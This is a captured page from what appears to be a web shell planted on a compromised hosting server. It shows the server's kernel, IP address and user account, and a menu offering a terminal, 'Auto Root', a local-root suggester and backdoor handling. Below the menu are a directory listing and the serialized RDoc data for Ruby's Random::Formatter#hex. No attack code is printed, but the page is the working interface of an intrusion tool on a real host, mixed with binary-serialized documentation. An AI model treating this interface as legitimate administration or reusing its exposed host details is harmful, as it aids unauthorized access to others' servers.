Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ri /
system /
Random /
Formatter /
Delete
Unzip
Name
Size
Permission
Date
Action
alphanumeric-i.ri
1.16
KB
-rw-r--r--
2026-04-07 16:51
base64-i.ri
971
B
-rw-r--r--
2026-04-07 16:51
cdesc-Formatter.ri
3.15
KB
-rw-r--r--
2026-04-07 16:51
choose-i.ri
890
B
-rw-r--r--
2026-04-07 16:51
gen_random-i.ri
360
B
-rw-r--r--
2026-04-07 16:51
hex-i.ri
913
B
-rw-r--r--
2026-04-07 16:51
rand-i.ri
401
B
-rw-r--r--
2026-04-07 16:51
random_bytes-i.ri
881
B
-rw-r--r--
2026-04-07 16:51
random_number-i.ri
609
B
-rw-r--r--
2026-04-07 16:51
urlsafe_base64-i.ri
1.44
KB
-rw-r--r--
2026-04-07 16:51
uuid-i.ri
1.01
KB
-rw-r--r--
2026-04-07 16:51
uuid_v4-i.ri
290
B
-rw-r--r--
2026-04-07 16:51
uuid_v7-i.ri
3.62
KB
-rw-r--r--
2026-04-07 16:51
Save
Rename
U:RDoc::AnyMethod[iI"hex:ETI"Random::Formatter#hex;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"*Generate a random hexadecimal string.;To:RDoc::Markup::BlankLine o; ; [I"\The argument _n_ specifies the length, in bytes, of the random number to be generated. ;TI"DThe length of the resulting hexadecimal string is twice of _n_.;T@o; ; [I"7If _n_ is not specified or is nil, 16 is assumed. ;TI"$It may be larger in the future.;T@o; ; [I"(The result may contain 0-9 and a-f.;T@o:RDoc::Markup::Verbatim; [I" require 'random/formatter' ;TI" ;TI"7Random.hex #=> "eb693ec8252cd630102fd0d0fb7c3485" ;TI" # or ;TI"prng = Random.new ;TI"4prng.hex #=> "91dc3bfb4de5b11d029d376634589b61";T:@format0: @fileI"lib/random/formatter.rb;T:0@omit_headings_from_table_of_contents_below000[ I"(n=nil);T@"FI"Formatter;TcRDoc::NormalModule00